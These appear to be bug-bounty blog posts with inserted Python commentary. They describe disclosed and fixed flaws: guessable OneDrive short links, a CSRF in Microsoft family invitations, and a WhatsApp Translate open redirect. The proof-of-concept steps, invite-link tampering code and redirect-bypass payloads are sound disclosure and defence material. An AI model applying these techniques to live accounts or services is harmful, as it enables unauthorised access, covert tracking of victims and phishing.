Thursday, 28 July 2016

How I made Microsoft remove shortened links for OneDrive documents.

In the name of Allah the beneficent the Merciful.

 

A few months ago I found a vulnerability in Microsoft's OneDrive that let me derive the editable link for a document from its "view only" link.

Proof of concept steps:
1) Log in as the victim in browser A and go to onedrive.live.com
2) Upload any document or file and then open the document, like this:
https://onedrive.live.com/view.aspx?cid=0cf9bc876832caee&page=view&resid=CF9BC876832CAEE!106&parId=CF9BC876832CAEE!103&app=Word

3) Now open Share and create two links:
  a) an edit link
  b) a view-only link

4) After that, shorten both links using the "Shorten link" hyperlink beside
the edit link and the view-only link.
5) You then get shortened links in this format
View only:
http://1drv.ms/1pFlbbq

Edit:
http://1drv.ms/1pFl93x

6) Notice that the two URLs share the prefix 1pFl and differ only in the last 3 characters.
7) Now give the view-only link to the attacker.
8) The attacker uses the view-only link and can predict the last 3
characters of the edit link.

Hence it was possible to escalate privilege: the attacker ends up with
the editable link for the document.

Note: the characters in http://1drv.ms/1pFlbbq were a combination of a-z,
A-Z and 0-9 only (62 possible characters). With only 3 unknown positions
that leaves 62^3 = 238,328 candidate edit links, a keyspace small enough
to enumerate, so it was not difficult for the attacker to predict them.
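As an added example (this is not code from the post, from Microsoft or from 1drv.ms), the following Python quantifies why the short codes were guessable and runs the enumeration the steps above describe against a constructed offline oracle, with no network access. The 62-character alphabet and the two short codes come from the post; the oracle, the function names and the "unpredictable code" generator shown for contrast are assumptions of this example, not how Microsoft fixed the issue (they removed shortening altogether).

```python
import itertools
import math
import secrets
import string

# 62-character alphabet the post observed in 1drv.ms short codes: a-z, A-Z, 0-9.
ALPHABET = string.digits + string.ascii_lowercase + string.ascii_uppercase

# Short codes quoted in the post.
VIEW_CODE = "1pFlbbq"
EDIT_CODE = "1pFl93x"


def common_prefix(a: str, b: str) -> str:
    """Longest shared prefix of two short codes."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return a[:n]


def keyspace(varying: int) -> int:
    """Number of candidates when only `varying` trailing characters are unknown."""
    return len(ALPHABET) ** varying


def entropy_bits(length: int) -> float:
    """Entropy of a uniformly random code of `length` characters over ALPHABET."""
    return length * math.log2(len(ALPHABET))


def candidate_codes(known_code: str, varying: int = 3):
    """Yield every code that shares all but the last `varying` characters of known_code."""
    prefix = known_code[:-varying]
    for tail in itertools.product(ALPHABET, repeat=varying):
        yield prefix + "".join(tail)


def enumerate_until(known_code: str, is_edit_code, varying: int = 3):
    """Try candidates in order until `is_edit_code` accepts one.

    `is_edit_code` stands in for whatever would tell an attacker that a code
    resolves to an edit link; in this example it is a constructed offline
    oracle, never a request to 1drv.ms. Returns (code, attempts), or
    (None, attempts) when the whole keyspace was exhausted.
    """
    attempts = 0
    for code in candidate_codes(known_code, varying):
        attempts += 1
        if is_edit_code(code):
            return code, attempts
    return None, attempts


def unpredictable_code(length: int = 16) -> str:
    """Assumed mitigation for contrast: a code built from enough uniformly random
    characters that enumerating a sibling code is infeasible (about 95 bits
    at 16 characters, versus under 18 bits for the 3 varying positions)."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


if __name__ == "__main__":
    print("shared prefix:", common_prefix(VIEW_CODE, EDIT_CODE))
    print("candidates for 3 positions:", keyspace(3), f"({entropy_bits(3):.1f} bits)")
    # The oracle here simply knows the answer; offline, it models a resolver
    # that would have answered "edit link" for the right code.
    found, tries = enumerate_until(VIEW_CODE, lambda c: c == EDIT_CODE)
    print("found", found, "after", tries, "attempts")
    print("random 16-char code:", unpredictable_code(), f"({entropy_bits(16):.1f} bits)")
```

The lesson is the one the post draws: a sequential or near-sequential identifier shared between a low-privilege and a high-privilege capability URL turns the higher privilege into a small brute-force problem, and only a large random identifier (or no shortening at all) closes it.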


Microsoft accepted the bug as valid and fixed the issue by completely removing shortened links. You can no longer shorten OneDrive links. Microsoft also acknowledged me as a security researcher for reporting the bug.

 

I am very happy to have helped protect the privacy of Microsoft users' data.

Thanks for Reading
Jai Hind  :) 
Contact  info :
facebook : facebook.com/haji.mohd871
twitter : @mohdhaji24
linkedin :  linkedin.com/in/mohd-haji-490960a0 

Microsoft user data privacy exposed -- Adding any Microsoft user as a family member and tracking their information

In the name of Allah the beneficent the Merciful.

 

A few months ago I discovered a CSRF issue in Microsoft's family settings that could have let me add any Microsoft user as a family member and then track their information.


This was a serious issue in https://account.microsoft.com/family#/
With this bug I could have made the victim accept a family member
invitation without their consent.

Proof of Concept steps :

Suppose the attacker has two emails, attacker@outlook.com and attacker1@outlook.com,
and the victim has one email, victim@outlook.com.

1) Log in as attacker@outlook.com, go to
https://account.microsoft.com/family#/
and add victim@outlook.com as your child in the family member section.

2) Then add attacker1@outlook.com as a child as well.

3) Microsoft sends an invitation email to both accounts,
attacker1@outlook.com and victim@outlook.com.

4) Now the attacker goes to the attacker1@outlook.com mailbox
and looks for the invitation email.
The link in it looks like this:


https://account.microsoft.com/family/invite-accept?invitationToken=ABQAFgEU1tvx-TFV0tYsdJFrOsNUa36IKGoOZgAADIAAABCKaYH-hI1ydg-ig5HcA8dywADb-R160uVY7cZdQyz65YRGk3hGQkUlI1rVLOOeXBsf5RFBm6Bf2LMTK604r6imsrAgMJqoA1UfWcBz4ceTBqc23iNphZRB3y1pWBXNxiSKh-CbKbzSQSaO8e7SUbSxujDbUDLtlulRuE5bc5afNnhIFIa6lM1sDghHj5kYt0nPcNqLJeVqNUdykXnUe4WRf9H9e7kzZUyqbPHYs69kAAJJY1oSF8dniMEG7x_JwkVzpOGkXCaZdwt_xJsxYjjAS7kgADrHkgB0cOsFV-fLJ9FlKXgfdtyMOHUXn4tl-4TTLGxD&cid=934985687410854638&email=YXR0YWNrZXIxQG91dGxvb2suY29t&ma=0&lang=en-US

5) In the above link, look at the parameter

email=YXR0YWNrZXIxQG91dGxvb2suY29t

This is the base64 encoding of attacker1@outlook.com.

6) So the attacker base64-encodes the victim's email address:
base64(victim@outlook.com) is dmljdGltQG91dGxvb2suY29t

Replacing the email parameter with that value, the link becomes:



https://account.microsoft.com/family/invite-accept?invitationToken=ABQAFgEU1tvx-TFV0tYsdJFrOsNUa36IKGoOZgAADIAAABCKaYH-hI1ydg-ig5HcA8dywADb-R160uVY7cZdQyz65YRGk3hGQkUlI1rVLOOeXBsf5RFBm6Bf2LMTK604r6imsrAgMJqoA1UfWcBz4ceTBqc23iNphZRB3y1pWBXNxiSKh-CbKbzSQSaO8e7SUbSxujDbUDLtlulRuE5bc5afNnhIFIa6lM1sDghHj5kYt0nPcNqLJeVqNUdykXnUe4WRf9H9e7kzZUyqbPHYs69kAAJJY1oSF8dniMEG7x_JwkVzpOGkXCaZdwt_xJsxYjjAS7kgADrHkgB0cOsFV-fLJ9FlKXgfdtyMOHUXn4tl-4TTLGxD&cid=934985687410854638&email=dmljdGltQG91dGxvb2suY29t&ma=0&lang=en-US



7) Now when you give the above link to victim@outlook.com, it asks the
victim for confirmation.

Okay, not bad, but there is a way around that as well :)

Just append matchAccount=true to the above URL,

and it becomes:





https://account.microsoft.com/family/invite-accept?invitationToken=ABQAFgEU1tvx-TFV0tYsdJFrOsNUa36IKGoOZgAADIAAABCKaYH-hI1ydg-ig5HcA8dywADb-R160uVY7cZdQyz65YRGk3hGQkUlI1rVLOOeXBsf5RFBm6Bf2LMTK604r6imsrAgMJqoA1UfWcBz4ceTBqc23iNphZRB3y1pWBXNxiSKh-CbKbzSQSaO8e7SUbSxujDbUDLtlulRuE5bc5afNnhIFIa6lM1sDghHj5kYt0nPcNqLJeVqNUdykXnUe4WRf9H9e7kzZUyqbPHYs69kAAJJY1oSF8dniMEG7x_JwkVzpOGkXCaZdwt_xJsxYjjAS7kgADrHkgB0cOsFV-fLJ9FlKXgfdtyMOHUXn4tl-4TTLGxD&cid=934985687410854638&email=dmljdGltQG91dGxvb2suY29t&ma=0&lang=en-US&matchAccount=true



8) Perfect. Now when you give the above link to victim@outlook.com,
the CSRF goes through without any verification on the victim's side,
and victim@outlook.com is registered as a child of attacker@outlook.com.
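As an added example, and not Microsoft's code or the post's, here is Python that reproduces the link manipulation in steps 4 to 8 offline and contrasts two models of the accept endpoint: one that behaves as the post observed (only the token is checked, and the client-supplied email and matchAccount parameters decide who is linked and whether a prompt appears), and a hardened one that ignores those parameters, links only the account the token was issued to, and consumes the token on use. The base64 values and parameter names are from the post; the FamilyService class, its method names, the generated tokens and the cid placeholder are constructed for this example and say nothing about how Microsoft's real service was implemented or fixed.

```python
import base64
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

ACCEPT_URL = "https://account.microsoft.com/family/invite-accept"


def b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


def unb64(s: str) -> str:
    return base64.b64decode(s).decode()


def build_invite_link(token: str, invited_email: str, cid: str = "0") -> str:
    """Invitation link in the shape quoted in the post (cid is a placeholder)."""
    params = {"invitationToken": token, "cid": cid, "email": b64(invited_email),
              "ma": "0", "lang": "en-US"}
    return f"{ACCEPT_URL}?{urlencode(params)}"


def parse_invite_link(url: str) -> dict:
    q = parse_qs(urlsplit(url).query)
    return {
        "token": q["invitationToken"][0],
        "email": unb64(q["email"][0]),
        "matchAccount": q.get("matchAccount", ["false"])[0].lower() == "true",
    }


def retarget_invite_link(url: str, victim_email: str) -> str:
    """Steps 6 and 7 of the post: keep the attacker's own token, swap the
    email parameter for the victim's base64 address, append matchAccount=true."""
    parts = urlsplit(url)
    q = parse_qs(parts.query)
    q["email"] = [b64(victim_email)]
    q["matchAccount"] = ["true"]
    return urlunsplit(parts._replace(query=urlencode(q, doseq=True)))


class FamilyService:
    """Constructed model of the accept endpoint. invites maps token ->
    (organiser, invited email) as recorded when the invitation was sent;
    children maps organiser -> linked child accounts."""

    def __init__(self) -> None:
        self.invites = {}
        self.children = {}

    def send_invite(self, organiser: str, invited_email: str) -> str:
        token = secrets.token_urlsafe(32)
        self.invites[token] = (organiser, invited_email)
        return build_invite_link(token, invited_email)

    def accept_vulnerable(self, logged_in_user: str, url: str) -> str:
        """Behaviour the post observed: any valid token will do, a missing
        matchAccount only triggers a prompt, and matchAccount=true links
        whoever is logged in, regardless of whom the token was sent to."""
        link = parse_invite_link(url)
        rec = self.invites.get(link["token"])
        if rec is None:
            return "invalid"
        organiser, _ = rec
        if not link["matchAccount"]:
            return "confirm"  # the prompt the victim saw in step 7
        self.children.setdefault(organiser, set()).add(logged_in_user)
        return "linked"

    def accept_hardened(self, logged_in_user: str, url: str) -> str:
        """Fix: the client-supplied email and matchAccount are never consulted.
        The logged-in account must be the one the token was issued to, and
        the token is single-use."""
        link = parse_invite_link(url)
        rec = self.invites.get(link["token"])
        if rec is None:
            return "invalid"
        organiser, invited = rec
        if invited.lower() != logged_in_user.lower():
            return "invalid"
        del self.invites[link["token"]]
        self.children.setdefault(organiser, set()).add(logged_in_user)
        return "linked"
```

The point of the contrast is where the binding between token and invitee lives: in the vulnerable model it is carried in the URL, so the party holding any valid token controls it; in the hardened model it is recorded server-side when the invitation is created and the URL parameters cannot change it. A real fix would also require the normal confirmation step regardless of any flag in the link.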


Impact of the vulnerability:
The impact of this bug was severe. The attacker would have been able to see the victim's activity and web browsing history, block websites for them, and so on.

Microsoft has fixed the issue and acknowledged me as a security researcher.
It is no longer possible to add anyone as a family member this way.

I am very happy to have helped protect the privacy of Microsoft users' data.

Here is CTF key :  596f755f676f745f696e746f5f626c6f67

Thanks for Reading
Jai Hind  :) 

Wednesday, 27 July 2016

Open Redirection in WhatsApp Translate (a Facebook acquisition)

In the name of Allah the beneficent the Merciful.

 

It was a Thursday night (the day before my semester exam) when I came to know that WhatsApp was now part of the Facebook bug bounty program, and I started hunting on it.
Soon I discovered an open redirection flaw in the WhatsApp Translate website, translate.whatsapp.com.

WhatsApp Translate has more than 10 million users all over the world.

Open redirection occurs when an application does not validate the URL it sends the visitor to after an action such as signing in. This lets an attacker redirect victims to malicious sites and carry out phishing and similar attacks.

Here is the GET request (the sign-in page takes the redirect target in the next parameter):


GET /sign-in?next=http://google.com/ HTTP/1.1
Host: translate.whatsapp.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/49.0.2623.108 Chrome/49.0.2623.108 Safari/537.36
Referer: https://translate.whatsapp.com/ 

 

 

After sign-in, WhatsApp Translate would have redirected the user to http://google.com/, the value of next, even though it is not a translate.whatsapp.com URL.
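As an added example (not WhatsApp's or Facebook's code, and not from the post), here is a Python validator for a next-style parameter beside the behaviour the post describes. It goes beyond the single http://google.com/ case in the request above and covers the variants a tester would try next: scheme-relative //host, backslash and percent-encoded forms, userinfo tricks such as https://allowed-host@evil, look-alike subdomains, non-http schemes and control characters. The allowed host is taken from the request; the function names, the default target and the set of rejected patterns are assumptions of this example.

```python
from typing import Optional
from urllib.parse import unquote, urlsplit

ALLOWED_HOST = "translate.whatsapp.com"  # host from the request in the post
DEFAULT_NEXT = "/"


def vulnerable_next(next_param: Optional[str]) -> str:
    """What the post describes: redirect wherever next= says, unvalidated."""
    return next_param or DEFAULT_NEXT


def safe_next(next_param: Optional[str], allowed_host: str = ALLOWED_HOST) -> str:
    """Return a redirect target that stays on allowed_host, else DEFAULT_NEXT.

    Accepts a same-origin path ("/projects/7?lang=de") or an absolute
    http(s) URL whose hostname is exactly allowed_host; in the latter case
    only the path and query are re-emitted, so no host taken from user
    input is ever written into the Location header.
    """
    if not next_param:
        return DEFAULT_NEXT
    # Decode once so "%2F%2Fevil" is seen as "//evil", then strip whitespace.
    target = unquote(next_param).strip()
    # Browsers treat a backslash like a forward slash in URLs; normalise
    # before any prefix check so "/\evil.com" cannot slip through as a path.
    target = target.replace("\\", "/")
    # CR/LF and other control characters have no place in a redirect target.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return DEFAULT_NEXT
    # A single leading slash is a same-origin path; "//host" is not.
    if target.startswith("/") and not target.startswith("//"):
        return target
    try:
        parts = urlsplit(target)
    except ValueError:  # e.g. a malformed IPv6 literal
        return DEFAULT_NEXT
    if parts.scheme.lower() not in ("http", "https"):
        return DEFAULT_NEXT
    # hostname is lower-cased by urlsplit and excludes userinfo and port,
    # so "https://translate.whatsapp.com@evil.example/" yields evil.example.
    if parts.hostname is None or parts.hostname != allowed_host.lower():
        return DEFAULT_NEXT
    if parts.username or parts.password:
        return DEFAULT_NEXT
    path = parts.path or "/"
    return path + (f"?{parts.query}" if parts.query else "")


if __name__ == "__main__":
    for candidate in ("http://google.com/", "//google.com", "/\\google.com",
                      "https://translate.whatsapp.com@google.com/",
                      "https://translate.whatsapp.com/projects/7?lang=de",
                      "/projects/7"):
        print(f"{candidate!r:55} vulnerable -> {vulnerable_next(candidate)!r:45} "
              f"safe -> {safe_next(candidate)!r}")
```

Re-emitting only a path is the design choice worth copying: an allow-list on the hostname alone still lets subtle parser differences between the server and the browser decide where the user ends up, whereas a relative target cannot leave the origin however the browser interprets it.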

 

Here is the video proof of concept demonstrating the attack.

 

Unfortunately, after a few days I got a response from the Facebook Security Team saying it was a duplicate issue.

Thanks for Reading
Jai Hind  :) 